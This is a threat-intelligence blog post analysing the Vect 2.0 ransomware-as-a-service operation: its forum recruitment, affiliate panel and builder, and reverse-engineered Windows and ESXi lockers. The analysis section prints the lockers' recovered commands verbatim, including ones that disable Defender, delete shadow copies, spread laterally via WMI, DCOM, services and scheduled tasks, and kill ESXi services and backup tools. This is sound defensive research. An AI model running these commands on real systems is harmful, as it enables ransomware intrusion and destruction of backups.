Executive Summary

It's hard to remember the days before everyone was jumping on the AI bandwagon, times when people were rushing to build a SaaS platform. These big shifts in adoption often have their shadow counterparts which we as security professionals document and deal with day to day. Scoundrels of all sorts are making their own service structures and pipelines... but for evil!

As we have seen the proliferation of ransomware throughout the last few years, we are starting to see the bad guys build robust ransomware offerings in the SaaS space. Vect ransomware has published and started marketing a ransomware-as-a-service (RaaS) platform in breakneck speed, which we will infiltrate and kick the tires on in this blog post.

Vect's RaaS release has entered the criminal services domain with the proliferation of its use by TeamPCP. So, it would behoove us to take a peek at its internals, highlight how these threat actors interact with the platform, easily build ransomware encryptors, execute attack campaigns, communicate with their victims, and perform operations on the platform day-to-day.

Additionally, as part of this research, we were able to obtain and analyze Vect 2.0 ransomware lockers to provide insight into advanced capabilities of the Vect ransomware toolkit, such as persistence, automated lateral movement for deployment, and EDR evasion techniques.

Deeper analysis of the Vect group and associated RaaS platform provide:

• 

  Affiliate recruitment strategies and a growing focus on public reputation

• 

  Visibility into a polished and optimized platform built to enable ransomware affiliates

• 

  Vect 2.0 affiliate reward systems, including earnings and commission structures

• 

  Integrated communication and ticketing systems to manage victims and operations

• 

  On-demand locker builds that speed up deployment and reduce barrier to entry

• 

  ESXi-targeted builds designed to disable firewalls and hypervisor functionality

Overview of Vect and Emerging Alliances

Vect ransomware, now officially renamed to Vect 2.0, is an emerging RaaS affiliate program that surfaced in early January 2026 and has steadily gained notoriety. In early January 2026, someone using the alias Vect was observed on the cybercriminal community BreachForums featuring a new ransomware variant and affiliate program. The post advertised a fully custom C++ ransomware locker made from scratch, with a feature set spanning cross-platform encryption, LAN pivoting (lateral movement), and a TOR-hosted affiliate panel available to prospective affiliates for a $250 registration fee.

Figure 1: Vect Ransomware Affiliate Post

In mid-February 2026, Vect issued a new post on BreachForums announcing Vect 2.0, claiming the locker had been completely rebuilt with improved encryption speed, full ESXi support, and enhanced Windows and Linux compatibility. The post (provided below) included messaging that the group was actively recruiting “penetration testers” and initial access specialists to support an expanded double-extortion operation.

Figure 2: Vect 2.0 Release Post

Vect's rise has also been fueled by a formal partnership with BreachForums (v6) administrators. This endorsement by what is believed to be an English-speaking threat collective, carries significant weight within the criminal community. To formalize the partnership, forum admins announced free Vect affiliate keys for members who have reached specified paid tiers on the platform, shown in the post below.

Figure 3: Vect Sharing They Are Giving Free Keys To Certain Ranks

Beyond this partnership, Vect has signaled a willingness to affiliate with actors operating within the Commonwealth of Independent States (CIS), such as Russia and Belarus. This may be an attempt to attract established operators and expand access into victim networks.

Figure 4: Vect Share They Are Giving Free Keys To Certain Ranks

In other efforts to enhance their brand and reach, Vect publicly announced plans to align with TeamPCP, a group that has recently made headlines due to several high-profile supply chain attacks targeting the developer ecosystem. Between March 19th and March 27th, TeamPCP executed a series of attacks across five vendor ecosystems in rapid succession, attacking Aqua Security Trivy on March 19th, Checkmarx KICS on March 21st, BerriAI’s LiteLLM Python project on March 23rd, and Telnyx's Python SDK on PyPI on March 27th.

TeamPCP’s attacks weaponized compromised workloads, including poisoning Trivy security tooling to trickle malicious code into environments and harvest credentials downstream. The stolen credentials and tokens were used to poison Continuous Integration / Continuous Deployment (CI/CD) pipelines and publish malicious versions of other commonly used developer packages, with payloads designed to identify additional secrets and amplify impact of the attack. As an example, the LiteLLM compromise alone was linked to hundreds of thousands of stolen credentials, with researchers estimating approximately 300 GB of compressed data exfiltrated across the campaign.

The BreachForums post below surfaced announcing a partnership between TeamPCP and Vect, with plans to jointly deploy ransomware against organizations affected by the recent supply chain attacks. The first confirmed Vect deployment believed to be using TeamPCP-sourced credentials followed shortly after.

Figure 5: Announcement Of The Partnership

In the same post, Vect announced, “Together, we are going to build something huge,” doubling down that, regardless of standing, all users on BreachForums would be eligible to get a free affiliate key and receive support to operate Vect ransomware.

In April 2026, a BreachForums administrator operating under the alias diencracked announced the distribution of Vect affiliate keys to all registered users on the forum, reflecting a deeper level of integration between the ransomware operation and the BreachForum community. The announcement accompanied a series of backend and security improvements to the forum itself, including stronger input validation, enhanced anti-injection and anti-XSS protections, rate limiting, and anomaly detection to reduce brute-force attempts and suspicious traffic.

Figure 6: Announcement Of Vect Keys Being Distributed

On April 17, 2026, BreachForums users began receiving automated direct messages containing their Vect access keys alongside auto-generated login credentials, marking the beginning of the actual distribution phase. The process appeared to be is fully automated and executed at scale, with keys assigned and delivered in bulk through accounts linked directly to forum profiles.

Figure 7: Direct Message Providing Vect Keys To Users

Inside The Vect RaaS Affiliate Panel

Beazley Security Labs obtained insider visibility into the proposed Vect 2.0 RaaS panel, allowing us to document what day-to-day operations might look like for an affiliate. The panel provides a polished interface and structured workflows to match, rather than a repurposed copypasta-code backend that some might expect from a newer operator. At the time of writing, the platform is exclusively accessible through TOR with no clearnet presence.

Operational workflow and resources are organized into three core functional areas detailed below: Operations, Communication, and Account Management. The sidebar navigation exposes a Dashboard, Builder, Earnings, Chat, Tickets, Announcements, FAQ, Rules, Settings, and a public profile page, covering the full operational lifecycle an affiliate needs from payload generation through to payout.

Earnings and Commission Structure

The Earnings section tracks affiliate performance across six metrics displayed at the top of the page: Level, Commission Rate, Total Earned, Available Balance, Pending, and Paid Out.

The commission tier structure is laid out within the panel in a gamified leveling experience, outlining what high-performing operators can expect to gain.

Figure 8: Vect 2.0 Affiliate Panel — Earnings Overview

Commission starts at 80% for Level 1 affiliates and scales upward as ransom totals accumulate. Payouts are supported in both Bitcoin and Monero, with a minimum payout threshold of $1,000, and wallet addresses are configured directly within the panel.

Building the Locker

The Builder section is where affiliates generate their deployment-ready payloads to stage and weaponize the locker within a victim’s environment. Each victim case is tied to a unique Chat ID, automatically linking the compiled binary to a corresponding negotiation session in the panel.

Figure 9: Vect 2.0 Affiliate Panel — Windows Builder

The builder exposes four tabs: Windows, Linux, ESXi, and Exfil . The Windows builder features configurable exclusions for file extensions or folder paths and includes a GPO Credentials field. The Credentials field allows an attacker to add domain credentials into the compiled locker payload, which enables automated lateral movement and mass deployment via GPO without requiring additional tooling.

The Linux and ESXi builder tabs follow a simpler configuration model. Each exposes a single toggle to enable an MOTD/Login Banner on compromised hosts, which could be leveraged to display attacker-controlled messaging at login. Both tabs present a dedicated build button that compile and return a platform-specific locker:

Figure 10: Vect 2.0 Affiliate Panel — Linux Builder

Affiliate Communications and Support

The panel includes a full communication and support infrastructure, indicating the Vect RaaS authors have put effort into providing affiliates an easy path for assistance and operations:

• 

  The Chat section provides private messaging between affiliates and panel operators, serving as a primary channel for alignment, troubleshooting, and negotiation handoffs.

• 

  The Tickets section implements a formal support ticketing system and is consistent with 24/7 support the group advertised in recruitment posts. The capability provides affiliates a structured way to report issues and receive assistance rather than relying on ad hoc communication.

• 

  The Rules section lays out the program's terms of engagement, covering expected conduct, prohibited targets, and operational guidelines affiliates are expected to follow. The presence of a formal ruleset is a common development in mature RaaS programs, giving operators a basis to remove or sanction affiliates who depart from the group’s interests.

• 

  The Announcements section provides operators a broadcast channel to push updates, new feature releases, and operational guidance to the entire affiliate base simultaneously.

Robust communication features demonstrate a move to reduce friction amongst Vect’s userbase and provide an almost professional level of community support within the RaaS offering itself to facilitate a growing pool of affiliates at scale.

Vect Locker Analysis and Capability

Vect RaaS operators have attempted to control access to their ransomware locker by warning affiliates not to create test builds without a defined target, likely in efforts to discover and ban security researchers such as ourselves. While we were able to gather private samples for analysis, we avoided our source risking their access, and instead used the samples to fingerprint already public Vect 2.0 submissions on VirusTotal for reverse engineering the locker:

Win64: 207b1a60f803d348c795d382f5aed9c3, aa72609186042f1d7d01ce070306a9f2

ESXi: 7f6864cf9c616b92898ca92b47c81d1f

Windows 64-bit Locker

Of the two public Windows 64-bit locker samples we found, one has submission telemetry closely correlating it to a specific victim that was previously reported on the Vect leak site. Dynamic analysis of the samples reveals typical locker behaviors.

The binary provides a familiar help dialog for its affiliate operators:

VECT 2.0

-h, --help Help

-v, --verbose Verbose output

-p, --path <dir> Target specific path

-c, --creds <b64> Override credentials

--gpo Enable GPO spread (default: on)

--no-gpo Disable GPO spread

--mount Enable network mount (default: on)

--no-mount Disable network mount

--stealth Enable self-delete (default: on)

--no-stealth Disable self-delete

--force-safemode Force safemode boot

Persistence is obtained by modifying this common registry run key on a victim’s system:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

Name: <locker file name>

Value: <locker file path>

The locker also issues commands to subvert Windows Defender via this Powershell command, observed during analysis:

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableScriptScanning $true"

The above command attempts to turn off real-time protection against scripts and files, while disabling real-time scanning and behavioral monitoring.

Backup copies from the Windows volume shadow copy utility are deleted with this command:

vssadmin delete shadows /all /quiet

As documented above, the Vect locker advertises automated lateral movement and deployment via GPO on Windows. We discovered a few built-in methods that attempt this, and functionality appears to be implemented via hardcoded Powershell scripts embedded within the locker.

Each method begins by setting up credentials (either hardcoded or supplied at the command line):

$cred=New-Object PSCredential($u,$sp)

It then enumerates hosts via AD:

$pcs=@([adsisearcher]'objectCategory=computer').FindAll()|%{$_.Properties.dnshostname[0]}|?{$_ -and $_ -ne $env:COMPUTERNAME}

Next, it copies itself to discovered machines:

Copy-Item $src $dest -Force -EA Stop

Then it attempts to execute the remote copy via various methods, including WMI:

Invoke-WmiMethod -ComputerName $pc -Credential $cred -Class Win32_Process -Name Create -ArgumentList "%ProgramData%\$name" -EA Stop

It can also execute via CIM:

Invoke-CimMethod -CimSession $sess -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="%ProgramData%\$name"} -EA Stop

Or through scheduled tasks:

$action=New-ScheduledTaskAction -Execute "%ProgramData%\$name" 

$principal=New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest 

$task=New-ScheduledTask -Action $action -Principal $principal 

$sess=New-CimSession -ComputerName $pc -Credential $cred -EA Stop 

Register-ScheduledTask -CimSession $sess -TaskName $tn -InputObject $task -Force -EA Stop|Out-Null 

Start-ScheduledTask -CimSession $sess -TaskName $tn -EA Stop

Through static analysis of the payload, we also discovered other hard-coded methods, included here for completeness. Methods include propagating via service installation:

sc.exe \\\\$pc create $svc binPath= \"C:\\ProgramData\\$name\" type= own start= auto 2>$null

sc.exe \\\\$pc start $svc 2>$null

sc.exe \\\\$pc delete $svc 2>$null

From scheduled tasks installed via the command line:

schtasks /create /s $pc /u $u /p $p /tn $tn /tr \"C:\\ProgramData\\$name\" /sc once /st 00:00 /ru SYSTEM /f 2>$null

schtasks /run /s $pc /u $u /p $p /tn $tn 2>$null

schtasks /delete /s $pc /u $u /p $p /tn $tn /f 2>$null

From DCOM:

$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application',$pc))

$com.Document.ActiveView.ExecuteShellCommand(\"C:\\ProgramData\\$name\",$null,$null,'7')

And finally, from basic command execution:

Invoke-Command -ComputerName $pc -Credential $cred -ScriptBlock {Start-Process \"C:\\ProgramData\\$using:name\"} -EA Stop

ESXi 64-bit Locker

The ESXi locker also provides an argument dialog showing its capabilities:

Options:

--path <dir> Target directory (default: /vmfs/volumes)

--spread Enable SSH lateral movement

--fast Fast mode: encrypt only 1MB

--medium Medium mode: encrypt 4 parts (64MB each)

--secure Secure mode: encrypt 100% (default)

--no-kill-vms Don't kill running VMs (encrypt only)

--verbose Enable verbose output

--help Show this help message

Vect executes the command `esxcli system process kill -p` on the following list of system processes:

dcbd, hostd, likewise, lwiod, ntpd, rabbitmqproxy, sensord, sfcb-vmware_base, slpd, smartd, snmpd, storageRM, vmfshba, vmkeventd, vmsyslogd, vmware-aam, vmware-fdm, vmware-usbarbitrator, vobd, vpxa, vsanmgmtd, vsansystem, wsman

The processes above cover a range of ESXi network and management capabilities, including remote logging (storageRM, vmkeventd, vmsyslogd, vobd), remote storage (vsanmgmtd, vsansystem), and availability management (vmfshba, vmware-aam).

These processes also manage AD functionality (likewise, lwiod), messaging middleware (rabbitmqproxy), CIM management (sfcb-vmware_base, slpd), and ethernet bridging (dcbd).

The ESXi locker also stops the following services via `esxcli system service stop -s`:

DCUI, TSM, TSM-SSH, hostd, lwsmd, ntpd, snmpd, vmsyslogd, vmware-aam, vmware-fdm, vpxa

These services mostly cover the same functionality mentioned above but also include the direct console user interface (DCUI), assumedly to cut off one of the main methods to troubleshoot and recover an appliance.

Vect also disables the firewall via the following commands:

esxcli network firewall ruleset set --enabled false --ruleset-id sshServer

esxcli network firewall ruleset set --enabled false --ruleset-id vSphereClient

esxcli network firewall set --enabled false

And stops the following services via their entries in /etc/init.d:

DCUI, TSM, TSM-SSH, hostd, lwsmd, ntpd, snmpd, vmsyslogd, vmware-aam, vmware-fdm, vpxa

Additionally, Vect runs the following commands to disable GhettoVCB and Veeam software:

ps | grep -i ghettoVCB | grep -v grep | awk '{print $1}' | xargs kill -9

ps | grep -i veeam | grep -v grep | awk '{print $1}' | xargs kill -9

ps | grep -i veeamtransport | grep -v grep | awk '{print $1}' | xargs kill -9

GhettoVCB and Veeam are system and file backup software systems. The Vect ESXi locker affects a wide array of core system processes but does not appear to do so in a targeted way. It appears more of an attempt to cut off all possible detection and recovery systems before it starts encrypting system files.

Conclusion

The emergence of Vect illustrates how quickly a motivated, modern ransomware operation can develop in a short period of time. In a matter of months, the group has progressed from recruitment activity to advertising a structured RaaS offering with purpose-built lockers, an affiliate panel, and tooling designed to support ransomware extortion and deployment campaigns in well-established criminal forums.

Vect’s focus on recruitment, reputation, and alliances with other well-known actors within criminal communities shows their desire for growth has paid off as their platform has become notorious in recent months. The group has positioned itself to be both accessible and credible in underground forums, and as a branded platform and operation, they’ve been able to produce an offering that’s appealing to threat actors.

The RaaS platform we demonstrated takes another step forward in commoditizing ransomware ecosystems. This lowers both operational and technical barriers for its users. Turnkey locker builds, standardized commission structures, and integrated extortion functionality provide operators with varying levels of skill to conduct ransomware operations with minimal ramping and setup.

Given the speed at which Vect has emerged and established credibility, continued monitoring of the group is warranted. This is evidenced by Vect’s efforts in partnering with other high-impact threat actors such as TeamPCP. These marketing efforts paired with tooling enhancements, could rapidly amplify the group’s reach and impact in the near future.